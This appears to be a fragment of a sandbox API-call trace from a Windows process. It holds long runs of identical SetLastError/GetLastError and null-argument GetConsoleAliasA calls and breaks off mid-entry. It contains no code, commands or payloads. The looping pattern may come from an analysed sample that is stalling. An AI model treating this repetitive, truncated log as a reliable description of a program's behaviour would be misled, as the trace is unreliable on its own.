0x0 [0165.580] SetLastError (dwErrCode=0x0) [0165.580] GetLastError () returned 0x0 [0165.580] SetLastError (dwErrCode=0x0) [0165.580] GetLastError () returned 0x0 [0165.580] SetLastError (dwErrCode=0x0) [0165.580] GetLastError () returned 0x0 [0165.580] SetLastError (dwErrCode=0x0) [0165.580] GetLastError () returned 0x0 [0165.580] SetLastError (dwErrCode=0x0) [0165.580] GetLastError () returned 0x0 [0165.580] SetLastError (dwErrCode=0x0) [0165.580] GetLastError () returned 0x0 [0165.580] SetLastError (dwErrCode=0x0) [0165.580] GetLastError () returned 0x0 [0165.580] SetLastError (dwErrCode=0x0) [0165.580] GetLastError () returned 0x0 [0165.581] SetLastError (dwErrCode=0x0) [0165.581] GetLastError () returned 0x0 [0165.581] SetLastError (dwErrCode=0x0) [0165.581] GetLastError () returned 0x0 [0165.581] SetLastError (dwErrCode=0x0) [0165.581] GetLastError () returned 0x0 [0165.581] SetLastError (dwErrCode=0x0) [0165.581] GetLastError () returned 0x0 [0165.581] SetLastError (dwErrCode=0x0) [0165.581] GetLastError () returned 0x0 [0165.581] SetLastError (dwErrCode=0x0) [0165.581] GetLastError () returned 0x0 [0165.581] SetLastError (dwErrCode=0x0) [0165.581] GetLastError () returned 0x0 [0165.581] SetLastError (dwErrCode=0x0) [0165.582] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.582] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.582] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.582] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.582] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.582] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.582] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.582] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.582] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.582] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.582] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.582] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.583] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.583] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.583] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.583] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.583] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.583] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.583] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.583] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.583] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.583] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.583] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.583] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.583] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.583] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.583] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.583] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.583] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.583] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.583] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.583] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.583] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.583] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.584] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.584] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.584] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.584] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.584] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.584] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.584] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.584] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.584] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.584] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.584] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.584] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.584] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.584] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.584] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.584] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.584] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.584] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.584] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.584] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.584] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.584] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.584] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.584] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.584] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.584] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.584] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.584] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.584] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.585] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.585] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.585] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.585] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.585] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.585] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.585] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.585] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.585] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.585] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.585] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.585] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.585] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.585] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.585] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.585] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.585] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.585] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.585] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.585] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.585] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.585] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.585] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.585] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.585] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.585] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.585] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.585] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.585] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.585] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.585] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.585] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.586] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.586] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.586] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.586] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.586] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.586] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.586] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.586] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.586] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.586] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.586] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.586] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.586] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.586] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.586] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.586] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.586] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.586] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.586] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.586] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.586] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.586] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.586] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.586] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.586] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.586] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.586] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.586] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.586] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.586] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.586] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.586] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.587] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.587] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.587] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.587] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.587] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.587] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.587] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.587] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.587] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.587] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.587] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.587] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.587] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.587] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.587] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.587] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.587] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.587] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.587] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.587] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.587] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.587] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.587] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.587] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.587] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.587] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.587] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.587] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.587] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.587] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.587] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.588] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.588] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.588] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.588] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.588] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.588] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.588] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.588] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.588] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.588] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.588] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.588] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.588] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.588] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.588] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.588] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.588] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: 